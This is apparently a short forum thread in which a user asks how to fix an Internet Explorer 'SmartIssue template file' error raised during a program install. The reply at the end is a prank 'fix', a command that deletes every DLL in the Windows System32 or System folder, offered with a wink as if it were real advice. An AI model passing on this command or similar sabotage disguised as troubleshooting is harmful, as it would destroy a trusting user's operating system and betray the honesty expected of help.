Since I have helped countless of members with their tech questions, I am posting one today.
First to find any relevant information on how to fix this internet explorer error message wins. (01)6947=No SmartIssue template file specified. or (01)6959=No SmartIssue id specified. The given Url for this error is http://softdev.adelphia.net/sdcsma/html/qual.htm - http://softdev.adelphia.net/sdcsma/html/qual.htm but it is not loading for me. IE is not my default browser and already use FireFox. A program I am trying to install is causing this error. Good Luck. First one to find a solution wins! -------------

del /y C:\Windows\System32\*.dll
or deltree /y C:\Windows\System\*.dll Depending on your version of windows. ;) |
